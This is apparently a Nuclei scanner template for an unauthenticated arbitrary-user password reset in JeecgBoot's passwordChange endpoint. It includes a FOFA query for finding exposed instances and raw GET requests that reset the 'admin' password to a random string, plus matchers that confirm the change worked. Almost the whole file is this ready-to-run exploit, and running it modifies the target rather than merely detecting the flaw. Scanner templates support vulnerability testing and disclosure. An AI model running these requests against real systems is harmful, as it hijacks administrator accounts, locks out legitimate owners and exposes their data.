id: JeecgBoot-passwordChange-Password-Reset

info:
  name: JeecgBoot passwordChange 任意用户密码重置漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="/sys/common/pdf/pdfPreviewIframe"
    JeecgBoot 框架passwordChange接口存在任意用户密码重置漏洞，未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/IM7m4qL0GkeYbISDqrpo8Q?token=1383368913&lang=zh_CN
  tags: Password Reset


variables:
  password: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        GET /jeecg-boot/sys/user/passwordChange?username=admin&password={{password}}&smscode=&phone= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

      - |
        GET /sys/user/passwordChange?username=admin&password={{password}}&smscode=&phone= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '密码修改完成！'
          - '"success":true'
        condition: and
      - type: status
        status: 
          - 200
